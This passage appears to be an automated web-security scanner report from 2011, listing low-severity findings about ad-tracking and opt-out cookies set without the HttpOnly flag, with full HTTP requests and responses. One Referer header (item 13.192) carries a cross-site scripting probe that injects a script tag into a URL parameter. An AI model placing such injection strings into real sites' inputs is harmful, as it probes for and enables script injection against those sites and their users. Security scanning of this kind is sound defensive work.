
Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7161733908578753/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@10@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:08:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@11@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.182. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7414057147689164/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7414057147689164/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7414057147689164/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@6@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:41:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@7@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.183. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.8592949255835265/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.8592949255835265/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.8592949255835265/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@9@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:02:44 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@10@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.184. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9192736572586/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9192736572586/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9192736572586/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@8@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:54:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@9@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.185. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9203020841814578/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9203020841814578/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9203020841814578/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:02 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.186. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9359824557323009/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9359824557323009/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9359824557323009/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:29:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@2@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.187. http://www.adadvisor.net/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adadvisor.net
Path:   /nai/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout?nocache=2.741539E-02 HTTP/1.1
Host: www.adadvisor.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ab=0001%3At0%2BFrgNo%2BFAbILbK0bvjQfxbqpTlpdNq

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:45 GMT
Server: Apache
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Set-Cookie: ab=opt-out; Domain=.adadvisor.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: aa=opt-out; Domain=.adadvisor.net; Expires=Tue, 14-Sep-2021 17:19:45 GMT; Path=/
Location: http://www.adadvisor.net/nai/verify
Content-Length: 0
Connection: close
Content-Type: text/plain

13.188. http://www.adbrite.com/mb/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /mb/nai_optout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mb/nai_optout.php?nocache=0.916557 HTTP/1.1
Host: www.adbrite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: Apache="168296556x0.184+1312290886x-1235322650"; ut="1%3AHczdEkAgEEDhd9nrLsRoGm8TyhC1QjGtd%2Fdze%2BabkyGW0GSw%2Bko%2B9Bs0ELwoIvEkpZmIU8EQ990Tj0bg8Ieg17kmfnq1WiqpOhi66TIv6dAuHwEGrXJOh%2FFfwn0%2F"; rb2=Ci4KBjc2MjcwMRiMzLScQCIeNDM5NTI0QUU5RTExMzc0RUIyQzBDNzE3NDBDNjA0EAE; vsd=0@2@4e74ce5b@www.gather.com; srh="1%3Aq64FAA%3D%3D"

Response

HTTP/1.1 302 Found
Content-Type: text/html
Date: Sat, 17 Sep 2011 17:15:01 GMT
Location: http://www.adbrite.com/mb/nai_optout.php?set=yes
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache
Set-Cookie: ut=deleted; expires=Fri, 17-Sep-2010 17:15:00 GMT; path=/; domain=.adbrite.com
Set-Cookie: b=deleted; expires=Fri, 17-Sep-2010 17:15:00 GMT; path=/; domain=.adbrite.com
Set-Cookie: untarget=1; expires=Tue, 14-Sep-2021 17:15:01 GMT; path=/; domain=adbrite.com
Content-Length: 0

13.189. http://www.addthis.com/api/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/nai/optout?nocache=0.1942716 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%2C%226%22%3A%222230616255569715877%22%7D..1316270110.1EY|1316270110.60|1316270110.1FE|1316270110.1WV|1316270110.10R|1315247533.1OD; uvc=6|33,6|34,15|35,14|36,8|37; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: uid=0000000000000000; expires=Tue, 14-Sep-2021 17:14:44 GMT; path=/; domain=.addthis.com
Set-Cookie: di=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Set-Cookie: dt=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Set-Cookie: loc=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Set-Cookie: psc=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Set-Cookie: uvc=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Location: /api/nai/optout-verify
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.190. http://www.bizographics.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /nai/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/optout?nocache=0.3010849 HTTP/1.1
Host: www.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcrEpGTrCjyXaj5XcunNcMDa7Re6IGD4lJ9Tis0ipJBrjZAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDW2wr0IgNIfwEVUJBxdqAyCAHxMRFwIDDbaJx1gHovcEOuphJipLa5wMipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sat, 17 Sep 2011 17:16:30 GMT
Location: http://www.bizographics.com/nai/checkoptout
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sat, 17-Sep-2011 17:16:31 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sat, 17-Sep-2011 17:16:31 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sat, 17-Sep-2011 17:16:31 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sat, 17-Sep-2011 17:16:31 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Thu, 15-Sep-2016 17:16:30 GMT; Path=/
Content-Length: 0
Connection: keep-alive

13.191. http://www.burstnet.com/cgi-bin/opt_out.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/opt_out.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/opt_out.cgi?nocache=0.7964712 HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: TID=174q04v1muc3qi; CMP=1AF.1Gg5^19q.1Gg5^186.1Eg1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Location: /cgi-bin/opt_out_verify.cgi
Content-Type: text/plain
Content-Length: 0
Date: Sat, 17 Sep 2011 17:16:43 GMT
Connection: close
Set-Cookie: CMS=1; domain=.burstnet.com; path=/; expires=Sun, 19-Jun-2011 17:16:42 GMT
Set-Cookie: CMP=1; domain=.burstnet.com; path=/; expires=Sun, 19-Jun-2011 17:16:42 GMT
Set-Cookie: TData=1; domain=.burstnet.com; path=/; expires=Sun, 19-Jun-2011 17:16:42 GMT
Set-Cookie: TID=1; domain=.burstnet.com; path=/; expires=Sun, 19-Jun-2011 17:16:42 GMT
Set-Cookie: BOO=opt-out; domain=.burstnet.com; path=/; expires=Thu, 15-Sep-2016 17:16:42 GMT
Set-Cookie: 56Q8=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=.www.burstnet.com

13.192. http://www.burstnet.com/enlightn/8117//3E06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117//3E06/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8117//3E06/ HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: TID=174q04v1muc3qi; CMP=1AF.1Gbw^19q.1Gbq^186.1Eg1; 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 16:35:40 GMT
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1Gbw^19q.1Gg5^186.1Eg1; path=/; expires=Mon, 17-Sep-2012 16:35:39 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;
13.193. http://www.burstnet.com/enlightn/8171//99D2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8171//99D2/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8171//99D2/ HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: TID=174q04v1muc3qi; CMP=1AF.1Gbw^19q.1Gg5^186.1Eg1; 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA; CMS=/

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:37:09 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1Gg5^19q.1Gg5^186.1Eg1; path=/; expires=Mon, 17-Sep-2012 16:37:09 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;
13.194. http://www.foxreno.com/2011/0915/29196544_320X240.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxreno.com
Path:   /2011/0915/29196544_320X240.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/0915/29196544_320X240.jpg HTTP/1.1
Host: www.foxreno.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 15 Sep 2011 19:49:28 GMT
ETag: "470c77-22e8-2cad4200"
Accept-Ranges: bytes
Content-Length: 8936
Content-Type: image/jpeg
Cache-Control: max-age=3101
Expires: Sat, 17 Sep 2011 17:16:27 GMT
Date: Sat, 17 Sep 2011 16:24:46 GMT
Connection: close
Set-Cookie: alpha=8b4a4350087e0000cec9744e6cb20b0008860500; expires=Tue, 14-Sep-2021 16:24:46 GMT; path=/; domain=.foxreno.com

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222........@.."..............................
...[SNIP]...
13.195. http://www.kaboodle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kaboodle.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
